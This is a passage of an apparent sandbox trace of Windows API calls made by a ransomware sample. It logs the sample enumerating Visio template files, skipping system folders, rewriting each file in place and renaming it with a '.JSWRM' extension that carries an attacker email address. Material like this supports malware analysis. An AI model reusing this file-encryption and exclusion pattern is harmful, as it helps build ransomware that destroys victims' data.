returned 1 [0147.014] lstrcmpiW (lpString1="DATFLO_M.VSTX", lpString2="...") returned 1 [0147.015] lstrcmpiW (lpString1="DATFLO_M.VSTX", lpString2="windows") returned -1 [0147.015] lstrcmpiW (lpString1="DATFLO_M.VSTX", lpString2="recovery") returned -1 [0147.015] lstrcmpiW (lpString1="DATFLO_M.VSTX", lpString2="perflogs") returned -1 [0147.015] lstrcmpiW (lpString1="DATFLO_M.VSTX", lpString2="documents and settings") returned -1 [0147.015] lstrcmpiW (lpString1="DATFLO_M.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0147.015] lstrcmpiW (lpString1="DATFLO_M.VSTX", lpString2="system volume information") returned -1 [0147.015] lstrcmpiW (lpString1="DATFLO_M.VSTX", lpString2="msocache") returned -1 [0147.015] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DATFLO_M.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.015] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DATFLO_M.VSTX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DATFLO_M.VSTX", lpUsedDefaultChar=0x0) returned 13 [0147.015] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DATFLO_M.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.015] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DATFLO_M.VSTX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DATFLO_M.VSTX", lpUsedDefaultChar=0x0) returned 13 [0147.015] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0147.015] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0147.015] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DATFLO_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\datflo_m.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0147.016] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=19593) returned 1 [0147.016] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.017] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x4c80, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x4c80, lpOverlapped=0x0) returned 1 [0147.019] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.019] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x4c80, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x4c80, lpOverlapped=0x0) returned 1 [0147.020] CloseHandle (hObject=0x314) returned 1 [0147.020] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DATFLO_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\datflo_m.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DATFLO_M.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\datflo_m.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0147.021] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a24140, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1a24140, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1a96a42, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xddac, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="DATFLO_U.VSSX", cAlternateFileName="DATFLO~1.VSS")) returned 1 [0147.021] lstrcmpiW (lpString1="DATFLO_U.VSSX", lpString2=".") returned 1 [0147.021] lstrcmpiW (lpString1="DATFLO_U.VSSX", lpString2="..") returned 1 [0147.021] lstrcmpiW (lpString1="DATFLO_U.VSSX", lpString2="...") returned 1 [0147.021] lstrcmpiW (lpString1="DATFLO_U.VSSX", lpString2="windows") returned -1 [0147.021] lstrcmpiW (lpString1="DATFLO_U.VSSX", lpString2="recovery") returned -1 [0147.021] lstrcmpiW (lpString1="DATFLO_U.VSSX", lpString2="perflogs") returned -1 [0147.021] lstrcmpiW (lpString1="DATFLO_U.VSSX", lpString2="documents and settings") returned -1 [0147.021] lstrcmpiW (lpString1="DATFLO_U.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0147.021] lstrcmpiW (lpString1="DATFLO_U.VSSX", lpString2="system volume information") returned -1 [0147.021] lstrcmpiW (lpString1="DATFLO_U.VSSX", lpString2="msocache") returned -1 [0147.021] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DATFLO_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.021] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DATFLO_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DATFLO_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0147.021] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DATFLO_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.021] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DATFLO_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DATFLO_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0147.021] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0147.021] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0147.021] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DATFLO_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\datflo_u.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0147.057] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=56748) returned 1 [0147.057] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.057] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0xdda0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0xdda0, lpOverlapped=0x0) returned 1 [0147.070] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.070] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xdda0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0xdda0, lpOverlapped=0x0) returned 1 [0147.070] CloseHandle (hObject=0x314) returned 1 [0147.071] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DATFLO_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\datflo_u.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DATFLO_U.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\datflo_u.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0147.073] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x49f9415, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x49f9415, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x49f9415, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x4b57, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="DATFLO_U.VSTX", cAlternateFileName="DATFLO~1.VST")) returned 1 [0147.073] lstrcmpiW (lpString1="DATFLO_U.VSTX", lpString2=".") returned 1 [0147.073] lstrcmpiW (lpString1="DATFLO_U.VSTX", lpString2="..") returned 1 [0147.073] lstrcmpiW (lpString1="DATFLO_U.VSTX", lpString2="...") returned 1 [0147.073] lstrcmpiW (lpString1="DATFLO_U.VSTX", lpString2="windows") returned -1 [0147.073] lstrcmpiW (lpString1="DATFLO_U.VSTX", lpString2="recovery") returned -1 [0147.073] lstrcmpiW (lpString1="DATFLO_U.VSTX", lpString2="perflogs") returned -1 [0147.073] lstrcmpiW (lpString1="DATFLO_U.VSTX", lpString2="documents and settings") returned -1 [0147.073] lstrcmpiW (lpString1="DATFLO_U.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0147.073] lstrcmpiW (lpString1="DATFLO_U.VSTX", lpString2="system volume information") returned -1 [0147.073] lstrcmpiW (lpString1="DATFLO_U.VSTX", lpString2="msocache") returned -1 [0147.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DATFLO_U.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DATFLO_U.VSTX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DATFLO_U.VSTX", lpUsedDefaultChar=0x0) returned 13 [0147.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DATFLO_U.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DATFLO_U.VSTX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DATFLO_U.VSTX", lpUsedDefaultChar=0x0) returned 13 [0147.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0147.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0147.073] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DATFLO_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\datflo_u.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0147.075] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=19287) returned 1 [0147.075] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.075] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x4b50, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x4b50, lpOverlapped=0x0) returned 1 [0147.078] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.078] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x4b50, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x4b50, lpOverlapped=0x0) returned 1 [0147.078] CloseHandle (hObject=0x314) returned 1 [0147.078] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DATFLO_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\datflo_u.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DATFLO_U.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\datflo_u.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0147.080] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4ade205, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x4ade205, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4ade205, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x39a5, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="DATMOD_M.VSTX", cAlternateFileName="DATMOD~2.VST")) returned 1 [0147.080] lstrcmpiW (lpString1="DATMOD_M.VSTX", lpString2=".") returned 1 [0147.080] lstrcmpiW (lpString1="DATMOD_M.VSTX", lpString2="..") returned 1 [0147.080] lstrcmpiW (lpString1="DATMOD_M.VSTX", lpString2="...") returned 1 [0147.080] lstrcmpiW (lpString1="DATMOD_M.VSTX", lpString2="windows") returned -1 [0147.080] lstrcmpiW (lpString1="DATMOD_M.VSTX", lpString2="recovery") returned -1 [0147.080] lstrcmpiW (lpString1="DATMOD_M.VSTX", lpString2="perflogs") returned -1 [0147.080] lstrcmpiW (lpString1="DATMOD_M.VSTX", lpString2="documents and settings") returned -1 [0147.080] lstrcmpiW (lpString1="DATMOD_M.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0147.080] lstrcmpiW (lpString1="DATMOD_M.VSTX", lpString2="system volume information") returned -1 [0147.080] lstrcmpiW (lpString1="DATMOD_M.VSTX", lpString2="msocache") returned -1 [0147.080] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DATMOD_M.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.080] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DATMOD_M.VSTX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DATMOD_M.VSTX", lpUsedDefaultChar=0x0) returned 13 [0147.080] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DATMOD_M.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.080] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DATMOD_M.VSTX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DATMOD_M.VSTX", lpUsedDefaultChar=0x0) returned 13 [0147.080] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0147.080] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0147.080] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DATMOD_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\datmod_m.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0147.082] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=14757) returned 1 [0147.082] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.082] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x39a0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x39a0, lpOverlapped=0x0) returned 1 [0147.095] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.095] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x39a0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x39a0, lpOverlapped=0x0) returned 1 [0147.096] CloseHandle (hObject=0x314) returned 1 [0147.096] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DATMOD_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\datmod_m.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DATMOD_M.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\datmod_m.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0147.097] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4a1f7cc, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x4a1f7cc, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4a1f7cc, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x38d9, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="DATMOD_U.VSTX", cAlternateFileName="DATMOD~1.VST")) returned 1 [0147.097] lstrcmpiW (lpString1="DATMOD_U.VSTX", lpString2=".") returned 1 [0147.097] lstrcmpiW (lpString1="DATMOD_U.VSTX", lpString2="..") returned 1 [0147.097] lstrcmpiW (lpString1="DATMOD_U.VSTX", lpString2="...") returned 1 [0147.097] lstrcmpiW (lpString1="DATMOD_U.VSTX", lpString2="windows") returned -1 [0147.097] lstrcmpiW (lpString1="DATMOD_U.VSTX", lpString2="recovery") returned -1 [0147.097] lstrcmpiW (lpString1="DATMOD_U.VSTX", lpString2="perflogs") returned -1 [0147.097] lstrcmpiW (lpString1="DATMOD_U.VSTX", lpString2="documents and settings") returned -1 [0147.097] lstrcmpiW (lpString1="DATMOD_U.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0147.097] lstrcmpiW (lpString1="DATMOD_U.VSTX", lpString2="system volume information") returned -1 [0147.097] lstrcmpiW (lpString1="DATMOD_U.VSTX", lpString2="msocache") returned -1 [0147.097] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DATMOD_U.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.098] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DATMOD_U.VSTX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DATMOD_U.VSTX", lpUsedDefaultChar=0x0) returned 13 [0147.098] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DATMOD_U.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.098] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DATMOD_U.VSTX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DATMOD_U.VSTX", lpUsedDefaultChar=0x0) returned 13 [0147.098] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0147.098] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0147.098] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DATMOD_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\datmod_u.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0147.103] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=14553) returned 1 [0147.103] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.104] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x38d0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x38d0, lpOverlapped=0x0) returned 1 [0147.110] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.110] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x38d0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x38d0, lpOverlapped=0x0) returned 1 [0147.113] CloseHandle (hObject=0x314) returned 1 [0147.113] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DATMOD_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\datmod_u.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DATMOD_U.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\datmod_u.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0147.116] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x3437c9a, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x3437c9a, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x3437c9a, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x507f, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="DBCHEN_M.VSSX", cAlternateFileName="DBCHEN~2.VSS")) returned 1 [0147.116] lstrcmpiW (lpString1="DBCHEN_M.VSSX", lpString2=".") returned 1 [0147.116] lstrcmpiW (lpString1="DBCHEN_M.VSSX", lpString2="..") returned 1 [0147.116] lstrcmpiW (lpString1="DBCHEN_M.VSSX", lpString2="...") returned 1 [0147.116] lstrcmpiW (lpString1="DBCHEN_M.VSSX", lpString2="windows") returned -1 [0147.116] lstrcmpiW (lpString1="DBCHEN_M.VSSX", lpString2="recovery") returned -1 [0147.116] lstrcmpiW (lpString1="DBCHEN_M.VSSX", lpString2="perflogs") returned -1 [0147.116] lstrcmpiW (lpString1="DBCHEN_M.VSSX", lpString2="documents and settings") returned -1 [0147.116] lstrcmpiW (lpString1="DBCHEN_M.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0147.116] lstrcmpiW (lpString1="DBCHEN_M.VSSX", lpString2="system volume information") returned -1 [0147.116] lstrcmpiW (lpString1="DBCHEN_M.VSSX", lpString2="msocache") returned -1 [0147.116] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBCHEN_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.116] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBCHEN_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, 